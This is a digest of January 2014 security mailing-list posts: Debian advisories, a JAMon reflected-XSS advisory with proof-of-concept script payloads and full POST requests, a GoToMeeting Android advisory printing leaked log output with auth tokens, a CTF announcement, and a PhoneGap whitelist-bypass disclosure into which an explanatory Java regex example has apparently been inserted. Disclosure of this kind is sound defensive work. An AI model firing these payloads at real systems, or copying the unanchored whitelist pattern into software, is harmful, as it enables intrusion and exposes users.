[SECURITY] [DSA 2848-1] mysql-5.5 security update

2014-01-24 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2848-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
January 23, 2014   http://www.debian.org/security/faq
- -

Package: mysql-5.5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-5891 CVE-2013-5908 CVE-2014-0386 CVE-2014-0393
 CVE-2014-0401 CVE-2014-0402 CVE-2014-0412 CVE-2014-0420
 CVE-2014-0437

Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to the new upstream
version 5.5.35. Please see the MySQL 5.5 Release Notes and Oracle's
Critical Patch Update advisory for further details:

 http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-34.html
 http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-35.html
 http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

For the stable distribution (wheezy), these problems have been fixed in
version 5.5.35+dfsg-0+wheezy1.

For the unstable distribution (sid), these problems have been fixed in
version 5.5.35+dfsg-1.

We recommend that you upgrade your mysql-5.5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7

2014-01-24 Thread Christian Catalano

###
01. ###  Advisory Information ###

Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low

02. ###  Vulnerability Information ###

CVE reference: CVE-2013-6235
CVSS v2 Base Score:  4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation

03. ### Introduction ###

The Java Application Monitor (JAMon) is a free, simple, high-performance, 
thread-safe Java API that allows developers to easily monitor production 
applications.


http://jamonapi.sourceforge.net

04. ### Vulnerability Description ###

Multiple non-persistent (reflected) cross-site scripting vulnerabilities have 
been identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site scripting 
(XSS) attacks.
This flaw exists because certain pages do not validate input before 
returning it to users.


+-------------------+-----------------+
| Vulnerable module | Parameter       |
+-------------------+-----------------+
| mondetail.jsp     | ArraySQL        |
| mondetail.jsp     | listenertype    |
| mondetail.jsp     | currentlistener |
| jamonadmin.jsp    | ArraySQL        |
| sql.jsp           | ArraySQL        |
| exceptions.jsp    | ArraySQL        |
+-------------------+-----------------+

05. ### Technical Description / Proof of Concept Code ###

05.01) Malicious Request (ArraySQL parameter):

The vulnerability is located in the 'Filter (optional)' input field 
upon submission to the pages:

http://localhost/jamon/mondetail.jsp
http://localhost/jamon/jamonadmin.jsp
http://localhost/jamon/sql.jsp
http://localhost/jamon/exceptions.jsp

The application does not validate the 'ArraySQL' parameter upon 
submission to the *.jsp scripts.

The attacker can inject the malicious JavaScript code:

1--1ScRiPt alert('XSS')/ScRiPt!--

in the 'Filter (optional)' input field and click the Go! button.

05.02) Malicious Request (listenertype parameter):

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 
Firefox/22.0 Iceweasel/22.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209

listenertype=1--1ScRiPtalert('XSS')/ScRiPt!--currentlistener=JAMonBufferListeneroutputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21


05.03) Malicious Request (currentlistener parameter):

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 
Firefox/22.0 Iceweasel/22.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

listenertype=valuecurrentlistener=1--1ScRiPtalert('XSS')/ScRiPt!--outputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21

06. ### Business Impact ###

This may allow an attacker to create a specially crafted request that 
would execute arbitrary script code in a user's browser within the trust 
relationship between their browser and the server.


07. ### Systems Affected ###

This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this 
vulnerability.


09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com

10.  ### Vulnerability History ###

October   18th, 2013: Vulnerability identification
October   22nd, 2013: Vendor notification [JAMon]
December  10th, 2013: Vulnerability confirmation [JAMon]
January   23rd, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.

###



[SECURITY] [DSA 2826-2] denyhosts regression update

2014-01-24 Thread Yves-Alexis Perez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2826-2   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
January 23, 2014   http://www.debian.org/security/faq
- -

Package: denyhosts
Vulnerability  : regression
Debian Bug : 734329
CVE ID : CVE-2013-6890

A regression has been found in the denyhosts packages fixing
CVE-2013-6890.  This regression could cause an attempted break-in
to be missed by denyhosts, which would then fail to enforce a ban.

For the oldstable distribution (squeeze), this problem has been fixed in
version 2.6-7+deb6u3.

For the stable distribution (wheezy), this problem has been fixed in
version 2.6-10+deb7u3.

For the testing (jessie) and unstable (sid) distribution, the package denyhosts
has been removed, and its users are encouraged to switch to an alternative like
fail2ban.

We recommend that you upgrade your denyhosts packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output (Android)

2014-01-24 Thread cjlacayo
1. ADVISORY INFORMATION

Title: GoToMeeting Information Disclosure via Logging Output (Android)
CVE: CVE-2014-1664
CVE Information: ASSIGNED
Date published: PUBLIC
Date of last update: 01/23/2014
Vendor Contacted: Citrix
Release mode: Coordinated Release

2. VULNERABILITY INFORMATION
Class:  Information Disclosure
Impact: CVSS Details specified below
Remotely Exploitable: No
Locally Exploitable:  Yes
CVE Name: [CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output 
(Android)

3. VULNERABILITY DESCRIPTION

The latest release of the software is vulnerable to information disclosure via 
logging output, resulting in the leak of userID, meeting details, and 
authentication tokens. Android applications with permissions to read system log 
files may obtain the leaked information.

4. VULNERABLE PACKAGES
- com.citrixonline.android.gotomeeting-1.apk version 5.0.799.1238 (Android)

5. NON-VULNERABLE PACKAGES
- other platforms untested

6. CREDITS
This vulnerability was discovered and researched by Claudio J. Lacayo.

7. TECHNICAL DESCRIPTION / PROOF OF CONCEPT CODE
! - SNIPPET --- !

D/G2M (32190): HttpRequest to: 
https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal(  787): hal_process_report_ind: Bad item quality: 11 
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 
6ms+1ms, total 33ms
D/G2M (32190): HttpRequest response from: GET 
https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]
 - 200
D/G2M (32190): HttpRequest response body: GET 
https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]
 - 
{Status:Redirect,RedirectHost:www1.gotomeeting.com,MeetingId:[MEETING_ID_REDACTED]}
D/G2M (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M (32190): HttpRequest to: 
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]
D/G2M (32190): HttpRequest response from: GET 
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]
 - 200
D/G2M (32190): HttpRequest response body: GET 
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]
 - 
{Status:MeetingNotStarted,MeetingId:[MEETING_ID_REDACTED],IsRecurring:false,Endpoints:[Native],OrganizerName:[REDACTED],Subject:[REDACTED],MaxAttendees:100,IsWebinar:false,AudioParameters:{CommParams:{disableUdp:false},ConferenceParams:{supportedModes:VoIP,PSTN,Private,initialMode:Hybrid,SpeakerInfo:{PhoneInfo:[{description:Default,number:[REDACTED],authToken:AAFe4rYexu4Dm7qrL45/Egx+AFLdeSkAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa,accessCode:REDACTED},userId:userId,authToken:EAEBAQEBAQEBAQEBAQEBAQE=,privateMessage:,audioKey:-1,BridgeMutingControl:true,VCBParams:{Codec:[{payloadType:103,frameLength:30,name:ISAC,bitrate:32000,channels:1,samplingRate:16000},{payloadType:0,frameLength:20,name:PCMU,bitrate:64000,ch
 
annels:1,samplingRate:8000}],VCB:{port:5060,ipAddr:10.23.70.151},Options:{asUpdates:true,rtUpdates:true,dtx:false,EndTime:139023990,StartTime:139023720,IsImpromptu:false}
D/G2M (32190): Got response from legacy JSON API: 200
D/G2M (32190): JoinService: Attempting to join Meeting
D/G2M (32190): MeetingService: Starting Meeting join on legacy...
D/G2M (32190): HttpRequest to: 
https://www.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M (32190): ServiceResolver: COLService: BaseURL 
[https://www1.gotomeeting.com], isLegacy [true}, isWebinar [false]
D/G2M (32190): HttpRequest response from: GET 
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 - 302
D/G2M (32190): HttpRequest response body: GET 

[CTF] nullcon HackIM 2014 will start at 24-01-2014, when the clock will strike at 11:59 (+5:30 GMT)

2014-01-24 Thread nullcon
·  This is blasphemy! This is madness!
·  Madness? THIS IS HACKIM!
·  H4x0rs! Ready your breakfast and eat hearty, for tonight, we dine in hell!
·  No retreat, no surrender. That is H4x0r law. And by H4x0r law, we
will stand and fight.. and conquer.

n00bs & haXors,

We are proud to present the sixth edition of HackIM, HackIM 2014
(http://ctf.nullcon.net).
The HackIM CTF will start on 24th Jan 2014 at 11:59 PM and will last till
26th Jan 2014 11:59 PM (GMT +5.30).
We've got se7en categories (a whopping 35+ levels in total!):

- Trivia
- Crypto
- Programming
- Web
- Reverse Engineering
- Exploitation
- Forensics

The winner gets a free VIP Pass for nullcon Goa 2014
(http://www.nullcon.net). If you've already bought the pass, we'll
reimburse it.
The winner and the top 8 runners-up will get the chance to participate in nullcon
JailBreak, along with a 4-night stay at the nullcon JAIL and a FREE VIP pass
for nullcon, if they choose to participate in the nullcon JailBreak
challenge. In JailBreak, participants will have to stay under house
arrest (12th-13th Feb 2014). JailBreak participants can stay at the same
venue till the 15th of Feb (even after JailBreak).

The unofficial back channel for the CTF is at irc.freenode.net #null0x00

Good luck and have fun :)

Special Thanks to the volunteers and supporters without whom this
would not have been possible.
http://ctf.nullcon.net/madprops.php

Cheers
nullcon Team
http://nullcon.net

--
___
nullcon goa V - spread love... not malware...
12-15th Feb 2014


Security Vulnerabilities in Apache Cordova / PhoneGap

2014-01-24 Thread mgeorgiev
The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and 
again on 1/17/2014. As there has been no response, we are re-posting it here 
to alert the general public of the inherent vulnerabilities in Apache 
Cordova/PhoneGap.

##
Dear PhoneGap contributors,


PhoneGap’s domain whitelisting for accessing native resources is
broken and can be bypassed. These vulnerabilities can be exploited by
any third-party domain loaded inside an iframe (e.g., malicious ad
scripts). Below, we give a brief summary of the vulnerabilities. You
can find more details in the paper 
http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.


1. Domain whitelisting on Android (before API 11) and Windows Phone 7
and 8 relies on the URL interception call, which does not intercept
iframe and XMLHttpRequest URLs. Consequently, it does not restrict
which domains can be loaded in iframes. Any script inside an iframe
can directly use PhoneGap’s internal JavaScript interfaces to the Java
objects and access native resources: for example, by calling
execute = cordova.require('cordova/exec'); var opts = cordova.require('cordova/plugin/ContactFindOptions');
and directly operating on these objects.


2. A malicious script running in an iframe can dynamically choose any
of PhoneGap’s vulnerable bridge mechanisms at runtime (e.g.
addJavascriptInterface or loadUrl on Android) and use it to bypass the
domain whitelist. We call this the chosen-bridge attack.


3. PhoneGap’s whitelisting check on Android is incorrect - it misses
an anchor at the end of the regular expression:
this.whiteList.add(Pattern.compile("^https?://(.*\\.)?" + origin));

For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.
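An added example (not Cordova's or the authors' code) contrasting the unanchored pattern above with an anchored one in Java, assuming "foo.com" is the whitelisted origin; the hardened pattern also quotes the origin so its dots match literally.

```java
import java.util.regex.Pattern;

// Added example, not Cordova/PhoneGap's own code. It contrasts the unanchored
// whitelist pattern quoted in the advisory with an anchored, origin-quoted one,
// using the assumed whitelisted origin "foo.com".
public class WhitelistAnchorDemo {
    static final String ORIGIN = "foo.com"; // assumed whitelisted origin

    // Same shape as the pattern quoted above: nothing after the origin, so the
    // host may continue with ".evil.com" and still satisfy the pattern.
    static final Pattern UNANCHORED =
            Pattern.compile("^https?://(.*\\.)?" + ORIGIN);

    // Hardened form: only dotted host labels may precede the origin, the origin
    // is quoted so its dots are literal, and the host must end right after it,
    // optionally followed by a port and then a path, query or fragment.
    static final Pattern ANCHORED = Pattern.compile(
            "^https?://([A-Za-z0-9-]+\\.)*" + Pattern.quote(ORIGIN)
            + "(:\\d+)?([/?#].*)?$");

    // find() only asks whether the pattern occurs somewhere in the URL, which
    // is what makes the missing end anchor matter.
    static boolean unanchoredAllows(String url) {
        return UNANCHORED.matcher(url).find();
    }

    // matches() requires the whole URL to fit the pattern.
    static boolean anchoredAllows(String url) {
        return ANCHORED.matcher(url).matches();
    }

    public static void main(String[] args) {
        String[] urls = {
            "https://foo.com",              // legitimate, no path
            "https://foo.com/index.html",   // legitimate
            "https://api.foo.com:8443/v1",  // legitimate subdomain with port
            "https://foo.com.evil.com/x",   // the bypass named in the advisory
        };
        // Expected: the unanchored check allows all four; the anchored check
        // allows the first three and rejects foo.com.evil.com.
        for (String url : urls) {
            System.out.printf("%-30s unanchored=%-5b anchored=%b%n",
                    url, unanchoredAllows(url), anchoredAllows(url));
        }
    }
}
```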

4. PhoneGap’s domain whitelisting on Android (API 11 or higher) and
iOS does not adhere to the same-origin policy.  Third-party scripts
included using script tags are blocked unless their source domain is
whitelisted, even though these scripts execute in the origin of the
hosting page, not their source origin.


5. Instead of just blocking access to bridges from non-whitelisted
domains, PhoneGap completely blocks these domains from being loaded in
the browser. This prevents ad-supported apps from displaying
third-party ads and destroys the look-and-feel of many Web pages.


We have a proof-of-concept implementation (a 400-line patch for
PhoneGap 2.9.0 on Android) called NoFrak
[https://github.com/georgiev-martin/NoFrak] which fixes these
vulnerabilities. NoFrak does not allow Web content from
non-whitelisted domains to access native resources but still displays
it correctly in the browser. If you are interested in discussing how
to merge NoFrak or some parts of NoFrak to PhoneGap’s main branch,
please let us know.


Thanks,

Martin, Suman, and Vitaly

##